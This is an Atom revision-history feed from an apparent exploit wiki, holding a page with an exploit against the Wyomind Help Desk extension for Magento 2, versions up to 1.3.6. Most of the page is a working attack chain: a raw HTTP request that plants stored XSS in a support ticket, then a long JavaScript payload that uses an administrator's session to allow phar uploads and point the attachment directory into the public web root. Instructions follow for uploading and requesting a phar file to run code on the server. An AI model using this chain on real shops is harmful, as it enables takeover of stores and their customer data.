https://pwnwiki.com/index.php?action=history&feed=atom&title=Wyomind_Help_Desk_1.3.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E
Wyomind Help Desk 1.3.6 遠程代碼執行漏洞 - Revision history
2026-04-06T22:00:43Z
Revision history for this page on the wiki
MediaWiki 1.35.1
https://pwnwiki.com/index.php?title=Wyomind_Help_Desk_1.3.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6516&oldid=prev
Pwnwiki: Marked this version for translation
2021-07-08T11:13:47Z
<p>Marked this version for translation</p>
<table class="diff diff-contentalign-left diff-editfont-monospace" data-mw="interface">
<col class="diff-marker" />
<col class="diff-content" />
<col class="diff-marker" />
<col class="diff-content" />
<tr class="diff-title" lang="chinese">
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">← Older revision</td>
<td colspan="2" style="background-color: #fff; color: #202122; text-align: center;">Revision as of 11:13, 8 July 2021</td>
</tr><tr><td colspan="2" class="diff-lineno" id="mw-diff-left-l1" >Line 1:</td>
<td colspan="2" class="diff-lineno">Line 1:</td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><languages /></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div><translate></div></td></tr>
<tr><td class='diff-marker'>−</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #ffe49c; vertical-align: top; white-space: pre-wrap;"><div>==漏洞影響==</div></td><td class='diff-marker'>+</td><td style="color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #a3d3ff; vertical-align: top; white-space: pre-wrap;"><div>==漏洞影響== <ins class="diffchange diffchange-inline"><!--T:1--></ins></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div></translate></div></td></tr>
<tr><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: <= 1.3.6</div></td><td class='diff-marker'> </td><td style="background-color: #f8f9fa; color: #202122; font-size: 88%; border-style: solid; border-width: 1px 1px 1px 4px; border-radius: 0.33em; border-color: #eaecf0; vertical-align: top; white-space: pre-wrap;"><div>Version: <= 1.3.6</div></td></tr>
<!-- diff cache key pwn_wiki:diff::1.12:old-6515:rev-6516 -->
</table>
Pwnwiki
https://pwnwiki.com/index.php?title=Wyomind_Help_Desk_1.3.6_%E9%81%A0%E7%A8%8B%E4%BB%A3%E7%A2%BC%E5%9F%B7%E8%A1%8C%E6%BC%8F%E6%B4%9E&diff=6515&oldid=prev
Pwnwiki: Created page with "<languages /> <translate> ==漏洞影響== </translate> Version: <= 1.3.6 ==EXP== <pre> # Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) # Date: 2021-0..."
2021-07-08T11:13:26Z
<p>Created page with "<languages /> <translate> ==漏洞影響== </translate> Version: <= 1.3.6 ==EXP== <pre> # Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) # Date: 2021-0..."</p>
<p><b>New page</b></p><div><languages /><br />
<translate><br />
==漏洞影響==<br />
</translate><br />
Version: <= 1.3.6<br />
<br />
==EXP==<br />
<pre><br />
# Exploit Title: Wyomind Help Desk 1.3.6 - Remote Code Execution (RCE) <br />
# Date: 2021-07-07<br />
# Exploit Author: Patrik Lantz<br />
# Vendor Homepage: https://www.wyomind.com/magento2/helpdesk-magento-2.html<br />
# Version: <= 1.3.6<br />
# Tested on: Ubuntu 18.04-20.04, Apache, PHP 7.2, Magento 2<br />
<br />
<br />
The Mangento 2 Help Desk extension from Wyomind up to and including version 1.3.6 is vunerable to stored XSS, directory traversal and unrestricted upload of a dangerous file type. These vulnerabilites combined could lead to code execution.<br />
<br />
A XSS payload can be sent via the ticket message from the front-end in the 'Support - My tickets' section. <br />
The payload is triggered when an administrator views the ticket in the Magento 2 backend. The following request enable<br />
the delivery of the XSS payload:<br />
<br />
POST /helpdesk/customer/ticket_save/ HTTP/1.1<br />
Host: <redacted><br />
Content-Type: multipart/form-data; boundary=---------------------------243970849510445067673127196635<br />
Content-Length: 683<br />
Origin: https://<redacted><br />
Connection: close<br />
Referer: https://<redacted>/helpdesk/customer/ticket_view/<br />
Cookie: <redacted><br />
Upgrade-Insecure-Requests: 1<br />
<br />
-----------------------------243970849510445067673127196635<br />
Content-Disposition: form-data; name="form_key"<br />
<br />
<redacted><br />
-----------------------------243970849510445067673127196635<br />
Content-Disposition: form-data; name="object"<br />
<br />
Hello<br />
-----------------------------243970849510445067673127196635<br />
Content-Disposition: form-data; name="message_cc"<br />
<br />
<br />
-----------------------------243970849510445067673127196635<br />
Content-Disposition: form-data; name="content"<br />
<br />
<p><script>alert(1)</script></p><br />
-----------------------------243970849510445067673127196635<br />
Content-Disposition: form-data; name="hideit"<br />
<br />
<br />
-----------------------------243970849510445067673127196635--<br />
<br />
<br />
<br />
The following XSS payload shown below can be used to trigger <br />
<br />
1) Enabling file attachments in ticket messages<br />
2) Adding 'phar' to allowed file extensions<br />
3) Setting the attachment directory to 'helpdesk/files/../../../pub'<br />
<br />
<br />
<script><br />
function successListener(e) { <br />
var doc = e.target.response<br />
var action=doc.getElementById('config-edit-form').action;<br />
<br />
function submitRequest()<br />
{<br />
var formKey = FORM_KEY;<br />
var xhr = new XMLHttpRequest();<br />
xhr.open("POST", action, true);<br />
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=---------------------------14303502862141221692667966053");<br />
xhr.withCredentials = true;<br />
var body = "-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"form_key\"\r\n" + <br />
"\r\n" + <br />
formKey + "\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_license]\"\r\n" + <br />
"\r\n" + <br />
"0\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_general]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[general][fields][enabled][value]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[general][fields][log][value]\"\r\n" + <br />
"\r\n" + <br />
"0\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[general][fields][default_email][value]\"\r\n" + <br />
"\r\n" + <br />
"\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[general][fields][default_status][value]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[general][fields][pending_status][value]\"\r\n" + <br />
"\r\n" + <br />
"2\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[general][fields][closed_status][value]\"\r\n" + <br />
"\r\n" + <br />
"3\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[general][fields][ticket_prefix][value]\"\r\n" + <br />
"\r\n" + <br />
"10000\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[frontend][fields][menu_label][value]\"\r\n" + <br />
"\r\n" + <br />
"Support - My Tickets\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[frontend][fields][top_link_enabled][value]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[frontend][fields][attachments][value]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_frontend_attachments_settings]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_extension][value]\"\r\n" + <br />
"\r\n" + <br />
"jpeg,gif,png,pdf,phar\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_directory_path][value]\"\r\n" + <br />
"\r\n" + <br />
"helpdesk/files/../../../pub\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_upload_max_filesize][value]\"\r\n" + <br />
"\r\n" + <br />
"2M\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[frontend][groups][attachments_settings][fields][attachments_post_max_size][value]\"\r\n" + <br />
"\r\n" + <br />
"4M\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails]\"\r\n" + <br />
"\r\n" + <br />
"1\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_customer_settings]\"\r\n" + <br />
"\r\n" + <br />
"0\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_enabled][value]\"\r\n" + <br />
"\r\n" + <br />
"0\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][confirmation_content][value]\"\r\n" + <br />
"\r\n" + <br />
"Dear {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + <br />
"Your message has been sent to the support team.\r\n" + <br />
"Here is the message content:\x3cbr/\x3e\r\n" + <br />
"\"{{message}}\" \x3cbr/\x3e\x3cbr/\x3e\r\n" + <br />
"Kind Regards,\r\n" + <br />
"The Support Team.\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_enabled][value]\"\r\n" + <br />
"\r\n" + <br />
"0\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[emails][groups][customer_settings][fields][notification_content][value]\"\r\n" + <br />
"\r\n" + <br />
"Hello {{customer_firstname}},\x3cbr/\x3e\x3cbr/\x3e\r\n" + <br />
"Your ticket \"{{ticket_object}}\" (#{{prefixed_id}}) has been updated.\r\n" + <br />
"Please login to your account via this link in order to see the new message: {{customer_account_link}}\x3cbr/\x3e\x3cbr/\x3e\r\n" + <br />
"Regards,\r\n" + <br />
"The Support Team.\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"config_state[wyomind_helpdesk_emails_support_team_settings]\"\r\n" + <br />
"\r\n" + <br />
"0\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_enabled][value]\"\r\n" + <br />
"\r\n" + <br />
"0\r\n" + <br />
"-----------------------------14303502862141221692667966053\r\n" + <br />
"Content-Disposition: form-data; name=\"groups[emails][groups][support_team_settings][fields][notification_content][value]\"\r\n" + <br />
"\r\n" + <br />
"You received a new message from a customer.\r\n" + <br />
"-----------------------------14303502862141221692667966053--\r\n";<br />
var aBody = new Uint8Array(body.length);<br />
for (var i = 0; i < aBody.length; i++)<br />
aBody[i] = body.charCodeAt(i); <br />
xhr.send(new Blob([aBody]));<br />
}<br />
submitRequest();<br />
}<br />
<br />
var request = new XMLHttpRequest(); <br />
request.onload = successListener; <br />
request.responseType = 'document';<br />
request.open('GET', document.querySelector('[data-ui-id="menu-wyomind-helpdesk-configuration"]').querySelector('a').href, true); <br />
request.send();<br />
</script> <br />
<br />
After the XSS payload is executed, it is possible to upload a phar file by attaching files to ticket messages. Upon successful upload, the uploaded files can be requested to trigger the execution of it by requesting<br />
<br />
https://[HOSTNAME]/<ticketId>/<messageId>/filename.phar <br />
<br />
ticketId and messageId can be identified after sending the ticket message with the attached phar file. The ticketId is visible in the <br />
URL, for example: <br />
<br />
https://[HOSTNAME]/helpdesk/customer/ticket_view/ticket_id/7/<br />
<br />
and the messageId can be identified by hovering over the uploaded file link which will be similar to <br />
<br />
https://[HOSTNAME]/helpdesk/customer/message_downloadAttachment/message/40/file/filename.phar<br />
<br />
in this case, the messageId is 40.<br />
</pre></div>
Pwnwiki